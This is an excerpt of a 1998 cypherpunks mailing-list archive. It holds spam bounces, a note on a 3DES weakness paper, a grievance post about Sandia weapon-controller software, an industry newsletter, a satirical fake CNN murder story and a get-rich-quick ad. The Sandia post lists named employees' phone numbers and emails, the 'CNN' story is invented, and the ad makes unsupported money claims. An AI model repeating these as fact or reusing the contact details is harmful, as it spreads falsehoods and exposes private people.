Arrival-Date: Tue, 31 Mar 1998 07:41:18 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:41:19 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:38 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:43:01 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311241.HAA01904@mx04.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:41:22 -0500 (EST)
from camel7.mindspring.com [207.69.200.57]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta4.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx04.globecomm.net
Received-From-MTA: DNS; camel7.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:41:22 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta4.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:41:23 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:37:43 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:40:38 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311244.HAA02821@mx04.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:44:09 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx04.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:44:09 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:44:10 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:30 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:41:12 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311244.HAA02901@mx04.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:44:22 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta2.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx04.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:44:22 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta2.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:44:23 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:42 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:42:52 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311244.HAA02935@mx04.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:44:28 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta4.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx04.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:44:28 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta4.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:44:29 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:49 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@globecomm.net>
Date: Tue, 31 Mar 1998 04:42:57 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199803311244.HAA02985@mx04.globecomm.net>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Tue, 31 Mar 1998 07:44:38 -0500 (EST)
from camel8.mindspring.com [207.69.200.58]

**
This is an automatic message to inform you that your email was not
forwarded through iName's server.

The iName email address that you tried to send mail to may not be active.
Reasons for the failed delivery attempt could include:

1. The iName customer has selected a new personalized iName email address
   rendering their old iName email address inactive.

2. The iName customer may have signed up for one of iName's free offers
   and then not validated their forwarding address.

3  The address may simply be typed incorrectly.  Please check that you
   typed the email address correctly.

iName provides email users with a permanent, personalized and secure email
address that is independent of how one accesses the Internet.  iName acts
as a global forwarding service.  All email sent to a permanent iName address
is automatically forwarded to a user specified destination email address.
Please visit iName's Online Support Area at
http://www.iname.com/info/intro/index.html for further information.
**

   ----- The following addresses had permanent fatal errors -----
debtzapper@mailexcite.com
    (expanded from: <cheapdentalplan@writeme.com>)

   ----- Transcript of session follows -----
... while talking to mta1.mailexcite.com.:
>>> RCPT To:<debtzapper@mailexcite.com>
<<< 550 [SMTPD]: This account has temporarily exceeded its incoming quota
550 debtzapper@mailexcite.com... User unknown


Reporting-MTA: dns; mx04.globecomm.net
Received-From-MTA: DNS; camel8.mindspring.com
Arrival-Date: Tue, 31 Mar 1998 07:44:38 -0500 (EST)

Final-Recipient: RFC822; <cheapdentalplan@writeme.com>
X-Actual-Recipient: RFC822; debtzapper@mailexcite.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; mta1.mailexcite.com
Diagnostic-Code: SMTP; 550 [SMTPD]: This account has temporarily exceeded its incoming quota
Last-Attempt-Date: Tue, 31 Mar 1998 07:44:39 -0500 (EST)


Subject: Some spam
From: cypherpunks@toad.com
Date: Tue, 31 Mar 1998 07:40:59 -0500 (EST)

Here is the information on the $9 dental plan we talked about. I 
apologise for the delay in getting the information to you but I 
have been swamped for request. Please fax me if you want more 
information or wish to sign up.

I don't know what you're talking about; thought I'd let you know.

Your buddy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 31 Mar 1998 04:45:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: 3DES Weakness
Message-ID: <199803311244.HAA20875@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


NYT-Markoff reports today on Biham and Knudsen's paper
on 3DES weakness, "Cryptanalysis of the ANSI X9.52 
CBCM Mode," noted here a few days ago.

The ANSI X9.F1 committee has held up implementing its
standard as a result, and may have to wait for AES. 
Credit is given to the worldwide DES crack.

   http://www.nytimes.com

See a mirror:

   http://jya.com/3des-weak.htm

Get the Biham/Knudsen paper:

  http://www.cs.technion.ac.il/%7Ebiham/publications.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 31 Mar 1998 08:31:07 -0800 (PST)
To: DJALLEN@sandia.gov
Subject: T 1563 and pals
Message-ID: <3521072D.7BE4@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 3/31/98 7:39 AM

John Gilmore
John Young
J Orlin Grabbe

Reading the stuff on the pals at

http://www.jya.com/pal-nukes.htm

http://www.research.att.com/~smb/nsam-160/pal.html

jogged my memory.

After we completed the Forth implementation of the 
Missile Secure Cryptographic Unit at least Hal Pruett,
Duane DeWerff, myself, and perhaps several others
were invited to NSA at Fort Meade in about 1985-6.

NSA employee Bill Legato assailed me for using Forth
for the implementation of the MSCU.

Legato hated Forth and relayed his hate to Sandia management.

This is one reason I was replaced as project leader by Tom Evans
who was later replaced by Eric Disch.

Possibly surprising, however, is that NSA sent Forth expert Don Simard
to
visit Sandia for several years.

Kent Parsons commented to me that he thought Simard was an NSA spy
sent to see what we were up to at Sandia.

Simard, along with Bill Goldrick, were the two reviewers of my 
SAND report now seen at http://jya.com/whpfiles.htm

EE Times, March 30, 1998 page 8

  A Java chip being to ship in quantity
  SAN FRANCISCO - Patriot Scientific Corp. surged to the head
  of the silicon pack at the JavaOne conference last week, showing 
  the PSC1000 RISC processor, which is shipping in quantity.
    "We'll be selling the chip for under $10 in volume and aiming at
  deeply embedded, low-power applications such as handheld devices
  and factory-floor control systems, " said Phil Morettini, vice
  president of Patriot (San Diego).
    Competing offering from LG Semicon and NEC Corp., each based on 
  Sun Microsystems Inc.'s picoJava core, are not yet available, although
  select customers are said to have samples.
    Separately, Rockwell Collins Inc. (Cedar Rapids, Iowa) said that it
has
  decided not to sell its Java-specific CPU on the merchant market.  The
  company unveiled the innovative processor last fall.

Here is their web site.

http://www.ptsc.com/

Charles Moore, inventor of Forth, is author of the Shboom Java native
code compiler for the PCS100.

Rockwell built a Forth-like chip many years ago.

I met Randy Dumse, who then worked for Rockwell, at a trade show.

I got a copy of the Rockwell R65F11 chip manual from Dumse.

Dumse quit Rockwell to start NewMicros seen at 

http://www.newmicros.com/

Click on history to see

http://www.newmicros.com/history.html

Of course, the Harris RTX 2000 chip used by NASA is a descendant of
Charles Moore's Novix Forth chip. http://groucho.gsfc.nasa.gov/forth/

Ballard, I was told by Jeff Allsup of Wood Hole, used polyForth to
discover the wrecks of the Titanic and Bismarck.

A central debate is whether a high-level language should be used for
a weapons programmer.

The implementer must be able to account for each bit.  In Forth I can.

Possibility exists that an disgruntled implementer might 'spike' a 
weapon so that it went off at an unintended time.  

Sandia supervisor Don Schroeder was an OUTSPOKEN critic of the T 1563
nuclear bomb controller.

SCHROEDER,DONALD H.       (505)845-8409  DHSCHRO   (505)844-9478  0519
DHSCHRO@sandia.gov

The T 1563 did not work very well.  One reason is that it was written in
about 112,000 lines of assembler.

NSA was reluctant to approve use of an operating system or even a
high-level 
language for crypto implementation for the reasons that security could
not be
guaranteed. 

Sandia did not have the resources required to write its own secure
operating system
and high-level language.

This is why we used the Forth operating system and high-level language.

Schroeder division employee Mike Sharp

SHARP,MICHAEL W.          (505)845-8444  MWSHARP   (505)284-3850  1138
MWSHARP@sandia.gov

wrote a T 1563 implementation in, I think C or Pascal.

Henry Newgass modified the transient part of command.com 
so that on power-up a PC directly entered Sharp's program.

Jerry Allen, who also saw the merits of using an operating system
and high-level language, funded Neugass.  

ALLEN,DOUGLAS J.          (505)845-9624  DJALLEN   (505)844-7593  1201  
DJALLEN@sandia.gov

I wrote the purchase order.

I learned several months ago that Sandia built a PC version of 
the T 1563 called the T 1663, I was told, which was supplied to 
the Air Force.

The threaded code - compiled native code battle continues.

I am sort-of happy to be back [somewhat] doing MASM code -
along with a bit of Forth and Forth assembler on the 80c32.

I see that J Orlin Grabbe is linking

  Permissive Action Links

at http://www.aci.net/kalliste/

I read

    Both strong links must be closed electrically -- one by specific
operator-coded input and one by      environmental input corresponding
to an appropriate flight trajectory -- in order for the weapon to be
armed. 

George Dullek and Jon Bryan worked together on accellerometers for
flight trajectory sensing.  

Dullek and Bryan are Forth programmers.

DULLECK JR.,GEORGE R.     (505)844-2628  GRDULLE   (505)844-8480  1073
GRDULLE@sandia.gov

BRYAN,JON R.              (505)844-2015  JRBRYAN   (505)844-6161  1003 
JRBRYAN@sandia.gov

Sandia had a division devoted to crystal oscillators.

The oscillators for the micro occasionally fail to start - a bad scene
if this happens when trying to arm
a nuke.

Dick Adams, also in department 2300, was in charge of oscillators. 
Adams never seemed to many of us
too interested in his job.

Adams took an early voluntary separation package from Sandia with a
large educational retraining
incentive.  And went to cooking school in San Francisco, Bob Wayland
told me.  The real world again.

Thanks to good research, some whistleblowing, and Internet details of
fuzing the US nuclear arsenal are being revealed.
  
Let's ALL hope for SETTLEMENT of this unfortunate mess before it gets
WORSE.  

I want my money and I am out of this mess.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-wow-com-news-update@nmpinc.com
Date: Thu, 2 Apr 1998 16:40:18 -0800 (PST)
Subject: WOW-COM News Update
Message-ID: <199804010155.UAA06291@Indy1.newmedium.com>
MIME-Version: 1.0
Content-Type: text/plain



======================================================
This update is sponsored by Hughes Network Systems
  http://www.joinhns.com
======================================================
CTIA's WOW-COM named a "TOP WEB SITE" by Mobile Computing &
Communications Magazine (2/98)

Dear WOW-COM Reader:

WOW-COM(TM) is the wireless industry's online information source, a
FREE service of CTIA.  The world of wireless is in constant motion.
Stay on top of industry news and benefit from CTIA's analysis by
reading http://www.wow-com.com everyday.
   
If you wish to remove yourself from this mailing list, please
send an email to 	<majordomo@nmpinc.com> with the following
command in the body of your email 	message:

     	unsubscribe wow-com-news-update

If you wish to get in contact with the owner of the list, (i.e.,
if you have difficulty 	unsubscribing, or have questions about
the list itself) please send email to <owner-wow-
com-news-update@nmpinc.com>.
Thank you.

INDEX:
======
1) IN TESTIMONY BEFORE HOUSE SUBCOMMITTEE, CTIA PRESIDENT &
CEO OUTLINES STEPS TO IMPROVE EMERGENCY SERVICES 
2)	CTIA's SEMI-ANNUAL DATA SURVEY TO BE PUBLISHED WEEK OF
MARCH 30, 1998 
3)	CIBERNET ANNOUNCES "THE ULTIMATE ROAMING AND BILLING AND
BILLING CONFERENCE," CIBERNET '98 
4)	LOOKING FOR A JOB IN THE WIRELESS INDUSTRY?
  
***********WIRELESS JOB OPPORTUNITY OF THE WEEK***********

http://www.wow-com.com/wworkplace/
  Company:   	Hughes Network Systems
  Job Title: 	Senior Digital Design Engineer - Hardware
  Location:  	Germantown, MD - US
  Job Description:   Lead digital design engineer for satellite
  baseband communications hardware.  Position requires experience in
  design of digital communications subsystems such as modulators,
  demodulators, digital filters, NCOs and FEC encoders/decoders.
  Requires BSEE (MSEE preferred) and 7-10 years of digital design
  experience with emphasis on communication circuit design.
**********************************************************************
IN TESTIMONY BEFORE HOUSE SUBCOMMITTEE, CTIA PRESIDENT & CEO OUTLINES
STEPS TO IMPROVE EMERGENCY SERVICES
==========================================================

http://www.wow-com.com/professional/whatshot
Every day, more than 83,000 wireless calls go to 9-1-1 or other

emergency service numbers. The wireless telecommunications industry,
public safety officials, and health care personnel have come together
to pursue enactment of legislation to set a uniform national emergency
system policy that will coordinate efforts to utilize wireless
technology to save lives. emergencies. Click above to see a summary of
Thomas E.Wheeler's testimony this week and the several key elements
that are important in any national policy to improve emergency medical
services.
CTIA's SEMI-ANNUAL DATA SURVEY TO BE PUBLISHED WEEK OF MARCH 30, 1998 
==========================================================

http://www.wow-com.com/professional
Do you know how many wireless subscribers there are in the U.S. today?
Are you curious to learn the latest benchmarks for the wireless
industry?  If so, check out CTIA's Web site http://www.wow-com.com
next week for the full details.  CTIA's Data survey, scheduled to be
released next week, includes information such as number of subscribers
in the U.S., number of cell sites in the U.S., number of employees in
the wireless industry, the average monthly consumer telephone bill
among other useful wireless statistics.  Remember, log on next week to
learn the key facts and figures about the wireless industry!
CIBERNET ANNOUNCES "THE ULTIMATE ROAMING AND BILLING CONFERENCE,"
CIBERNET '98 
==========================================================

http://www.wow-com.com/results/professional/whatshot
Save the date!  May 14 - 15, 1998 (San Diego, California) 
CIBERNET, world leader in the development of intercarrier billing
standards and provider of financial settlement services offers you an
educational opportunity to learn about the roaming related issues that
are going to have a direct impact on your company's bottom line. If
you work in revenue assurance, roaming or billing - this conference is
the place to be.  Sign up now!  Questions? Call 202-736-3661. 
LOOKING FOR A JOB IN THE WIRELESS
INDUSTRY?==========================================================

http://www.wow-com.com/wworkplace/
Join thousands of other wireless professionals searching for the
perfect wireless job opportunity by logging on to CTIA's Career
Center.  This free online career service offers wireless industry
employment opportunities and information on leading wireless
employment and professional placement services.  The Career Center is
global, offering international job listing and direct access to the
global wireless workplace.  Click above to find your next wireless job
opportunity! 
=============================
MORE WOW-COM(TM) FEATURES
=============================
WOW-COM(TM) is current: Routine Updates throughout the business day 
WOW-COM(TM) is insightful: CTIA's unbiased analysis 
WOW-COM(TM) is beneficial: Find products and services in
WOW-COM(TM)'s
Virtual Trade Show.   List open positions in the WOW-COM(TM) Career
Center, receive resumes via email and hire qualified individuals.
========================================================
This update sponsored by: HUGHES NETWORK SYSTEMS

http://www.hns.com/

http://www.joinhns.com
Hughes Network Systems is one of the fastest-growing digital
communications companies 
in the world, providing world-class wireless, satellite and broadcast
products to customers in 
over 60 countries.  Today, HNS employs over 500 software engineers and
200 hardware engineers 
dedicated to developing our products, services and systems from our
Germantown, Maryland headquarters and San Diego, California facility.
Click above to learn more.
HNS HOT JOBS CAREER INVITATIONAL. On Saturday, April 25, Hughes
Network Systems (HNS) is hosting a Hot Jobs Career Invitational at our
facility in Gaithersburg, Maryland (metro Washington, DC). For this
1-day event, we're bringing in the best the industry has to 
offer to meet with our Hiring Managers. Interview expenses will be
paid for qualified candidates.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Tue, 31 Mar 1998 20:05:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: CNN - DeathMonger
Message-ID: <3521D872.5B77@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


SITE SOURCES
    Contents
    Help!
    Search
    CNN Networks


Two Saskatchewan Freemen Assassinated

One of the Freemen holds a drink during the
81-second standoff on April 1, 1998

Assassination stemmed from Microsoft standoff?

Bienfait, SASK (AP) - TruthMonger I and TruthMonger II were
assassinated in an 81-second standoff with an unidentified
team of freelance assassins who accomplished their goal
without firing a single shot.
A few short minutes after the CoalDust Saloon opened for
business, a limousine bearing Redmond, Washington, license
plates pulled up outside the bar, and a half-dozen black-clad,
heavily armed figures raced into the building, behind the
cover of smoke and tear-gas grenades. They were met by a heavy
fusillade of gunfire from a variety of surprised morning drunks
who were onery as snot, not yet having finished their first beer of
the morning.

The assassins rushed into the bar and established strategic
positions, only to find that the two TruthMonger entities who
were the target of the raid already lay dead on the floor.
They quickly rushed out of the CoalDust Saloon and piled into
the limousine, which headed for the American border.

The day-shift barmaid who investigated the scene--in the absence
of local RCMP, who were busy on the reservation legally murdering
WagonBurners-noted that TruthMonger I and TruthMonger II had both
been shot in the head from behind.
Blanc Weber, a member of the Circle of Eunuchs who claimed to
have been "just passing through" Bienfait, at the time, and who
was reported to be standing behind the TwoMongers when the
shooting began, theorized that the fatal shots came from the
grassy knoll behind the bar.
When confronted by an angry crowd of drunken losers who pointed
out that Weber's anger over the TruthMonger Cult of One Clan
including references to her in their Death Threat!!!(s) against
an unnamed billionaire from Redmond, Washington, she bought a
round of drinks for the house, and the matter was quickly dropped.

Jeff Sandquist, a Microsoft employee who had earned his bones by
cleaning up the mess that Circle of Eunuchs founder, C.J. Parker
had made of the computer systems at the offices of a local mobile
home manufacturer, verified Blanc Weber's claims about the shots
coming from the grassy knoll, noting that three bums (Mark Hedges,
Robert Canizales, and a shadowy figure known only as Sameer) had
been picked up shortly after the incident by Estevan City Police,
and taken for a free breakfast at the Husky Truckstop.
Sandquist and Weber were picked up and spirited away by a strange
figure who refused to reveal his identity, but noted that it was
imperative for the group to leave quickly, because "at night, the
ice weasels come."

TruthMongerI.jpg

TruthMongerII.jpg

Local members of the Royal Canadian Mounted Gestapo later indicated
that their investigation into the matter revealed that local law
enforcement personnel in Redmond, Washington, could not find any
suspects in their files matching the description of a billionaire
in a limousine. A follow up inquiry by CNN reporters proved to be
unsuccessful, as all of the officers involved on both sides of the
border had retired by the end of the day.

At a wake held for the TwoMongers after a truckload of Olympia beer
unexpectedly arrived at the bar, the massive crowd that suddenly
appeared out of nowhere reminisced about their fallen drinking
buddies.

"It was probably an act of mercy, since they had been suffering
greatly since installing Win95 on their systems."
~Anonymous

"Ever since TM-I's cousin died of a mysterious heart-attack after
being put in a cage with the female guerillas, we knew it was
only a matter of time before Blanc Weber saw the light and
decided to become a Claire Wolfe in Sheeple's clothing."
~Nobody

"I *love* this bar..."
~A visitor from Boston


                (c) 1998 Cable News Network, Inc.
                A Time Warner Company
                All Rights Reserved.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: freestuff13@juno.com
Date: Tue, 31 Mar 1998 22:10:42 -0800 (PST)
To: freestuff13@juno.com
Subject: Hi :-)
Message-ID: <199804010610.WAA29676@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




INTERNET INSIDER REVEALS JEALOUSLY GUARDED SECRETS 
             AND GIVES AWAY $1,000 OF FREE STUFF!!!!
              
"I finally found the secrets I've been looking for.  Your manual  
tells all and has given me the tools I need to succeed, finally a 
genuine Internet insider tells all!  If you're doing business on the 
web or have ever wanted to, this is a must have.  You're the best,
I'm making your manual into my Internet Bible! Thanks a million!"

Best Regards,
(Elaine forester) Florida

WOW!, What a value your program is! Just the secrets on
email was worth the price alone, not to mention all the other
valuable things you included. I have already put up some ads
and I'm getting positive results.

Tom Hatcher - Minnesota


Hello Internet friend,

Some of you may already have purchased some "electronic
marketing course" or tried to market some product online.
Maybe you even made a sizeable profit! Whatever the case may
be; No matter how successful you are right now, you can
profit tremendously from what we are about to tell you!

FACT:  ANYONE WHO HAS THE DRIVE TO SUCCEED CAN ACTUALLY MAKE 
A SIZABLE PROFIT ON THE INTERNET.

FACT:  NOT MANY PEOPLE ARE WILLING TO TAKE THE TIME TO ACTUALLY DO IT.

Why would people want to pass up this extremely valuable money making opportunity?

Because learning is the key to succeeding online.  Marketing on the Internet 
requires a wealth of  knowledge.  To learn everything you need to know 
about Marketing on the Internet takes more time than any human being 
can spare.  The small amount of Internet marketers actually making a 
sizable profit know this all too well. 

Let me explain.

Right now there are over sixty million people surfing the Internet.  By
the year 2000, that figure is expected to more than double. With so many 
people using the Internet, smart "net"repreneur's are taking advantage 
of what this new (in terms of true commercial application) and exciting 
medium has to offer.

The Internet presents one of the best ways to make money that has 
ever been introduced. On any given day you have the opportunity to 
reach more people than most cities have population wise. This is the 
reason so many businesses are scrambling to make their presence
known on the Internet. 

CONSIDER THIS POSSIBILITY: You wake up in the morning and 
you put on a pot of coffee. As you sip on your cup of hot "brew" you 
saunter over and turn your computer on. Then, as your monitor glows 
from dim to bright, you find that you have inquiries from all sorts of 
people requesting what you have to offer. Later, after you have 
finished reading your inquiries, you stroll out to your mailbox. You 
find it is filled with letters from people from all across the world! 
What's even better though, is that the letters are FILLED WITH 
MONEY; cash, checks, and money orders. Then, after tallying 
up the totals, you find that you have made anywhere between  
$200 to $1,000 and it isn't even one o'clock in the afternoon. 
 
Think of it: NO boss, NO traffic, and NO annoying Co-workers. 
Wouldn't it feel great to wake up in the morning knowing you 
are going to be making excellent money but don't have to leave 
your house to do it!?!  Wouldn't your life be far less complicated?

The truth is, you can be one of those who become financially
independent via the Internet. AND THE BEST PART IS...IT 
DOESN'T REQUIRE A LOT OF MONEY!!

What it does require is the knowledge of how, what, and where 
to do it. That is where we can help. We provide you with 
the knowledge of how to begin earning substantial income from 
your computer via the "information superhighway".   

Now think about this:

WHAT IF?  We could provide YOU with an incredible Marketing Package 
that encompasses all the "How To" information you need to be a success 
on the Internet.  This phenomenal package includes DETAILED Internet 
SECRETS (we don't hold anything back, its all here folks!!), which explains 
in detail how to Profit from the Internet Explosion.  Whether you have a 
business of your own or you want to start one.  It's filled with over 45 packed 
pages revealing the secrets about electronic marketing so many other online 
marketers DON'T want you to know.  PLUS $1,000 WORTH OF FREE STUFF
TO HELP YOU WITH MARKETING YOUR BUSINESS ON THE INTERNET!!!

We thought that might interest YOU.

We can remember how overwhelming the Internet seemed when we
were first introduced to it.  We realized the marketing and profit 
potential the Internet holds, but really had no idea how to pursue it. 
In our thirst for answers and knowledge, we purchased everything 
we could find that had information on the How, What, and Where. 
We spent thousands of dollars, but we now know what works and
what doesn't.  No where, in all of our searching, could we find a 
complete packet of information for all of our questions.  That is why 
we decided to write this report.  We have compiled every proven 
method and secrets that we have learned along the way into one 
complete, easy to understand report.

Our PROVEN REPORT makes believers of skeptics!  

Sound too good to be true?  That's what others have said.  That is, 
until they received their reports and saw for themselves just how easy
it is to make money on the net!  Here are just a few of the many great 
comments we get back from people every week.


Hi NI,

